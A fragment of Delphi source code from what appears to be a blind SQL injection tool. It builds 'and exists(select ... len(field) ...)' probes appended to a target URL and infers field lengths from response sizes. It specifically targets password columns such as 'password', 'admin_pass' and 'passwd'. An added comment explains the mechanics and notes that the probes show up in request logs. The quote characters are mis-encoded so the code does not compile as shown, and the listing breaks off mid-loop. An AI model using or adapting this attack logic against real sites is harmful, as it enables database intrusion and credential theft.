procedure TMainForm.GuessContProc(ListInt: integer); {SQL注入 - 多线程猜解字段内容}
{ Builds the probe URL for a single length comparison on FieldName.
  Url       - base request URL; the clause below is appended to it unchanged
  TopStr    - inserted verbatim into the inner "select top ... id" sub-query
  TableName - inserted verbatim (three times); no quoting or URL-encoding applied
  FieldName - inserted verbatim inside "len( ... )"; no quoting or encoding applied
  LevelStr  - comparison operator placed after len(FieldName); callers in this
              file pass '=' or '<='
  Len       - integer compared against len(FieldName), formatted with IntToStr
  Returns: Url + an "and exists(select * from ...)" clause with %20 as separator.
  Callers (GuessContProc) hand the result to Get_HttpSize and compare the
  returned size with and1Num, so the only information used is the response-size
  difference between a true and a false comparison. For detection: the literal
  exists / select / len( / top tokens and %20-joined SQL sit in the query string
  itself, so they are visible in plain request logs.
  NOTE(review): the ’ characters used as string delimiters are not valid Pascal;
  they look like mis-encoded ' from page extraction — as shown, the Result line
  will not compile. }
function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;
begin
Result := Url + ’%20and%20exists(select%20*%20from%20’ + TableName +’%20where%20len(’ + FieldName + ’)’ + LevelStr + IntToStr(Len) + ’%20and%20id=(Select%20max(id)%20From%20’ + TableName +’%20where%20id%20in%20(select%20top%20’ + TOPStr + ’%20id%20from%20’ + TableName + ’%20Order%20by%20id)))’
end;
var
TableName: string;
FieldName, S: string;
ContentInt: integer;
i, Len, LengthInt, N: integer;
GridCount: integer;
Colu: TColumn;
FlagBool: boolean;
begin
Len := 0;
LengthInt := 0;
FlagBool := True;
TableName := TableNameLst.Items[TableNameLst.Itemindex];
FieldName := Memo2.Lines[ListInt];
if (LowerCase(FieldName) = ’password’) or (LowerCase(FieldName) = ’pass’) or
(LowerCase(FieldName) = ’admin_pass’) or (FieldName = ’密码’) or
(LowerCase(FieldName) = ’userpassword’) or (LowerCase(FieldName) = ’passwd’) then
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, 16), 800);
if ContentInt >= and1Num then
begin
SqlResultMemo.Lines.Add(FieldName + ’长度: 16’);
LengthInt := 16
end
else
begin
while (Len <= 50) and (FlagBool) do
begin
application.ProcessMessages;
inc(Len, 2);
Pane1.Caption := ’正在检测长度:Len(’ + FieldName + ’)=’ + inttostr(Len);
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’<=’, Len), 800);
if ContentInt >= and1Num then
begin
for N := Len - 1 to Len do
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);
if ContentInt >= and1Num then
begin
LengthInt := N;
SqlResultMemo.Lines.Add(FieldName + ’长度: ’ + inttostr(N));
FlagBool := False;
Break;
end; // if
end; // for
end; // if
end; // while
end;
end
else
begin
while (Len <= 50) and (FlagBool) do
begin
application.ProcessMessages;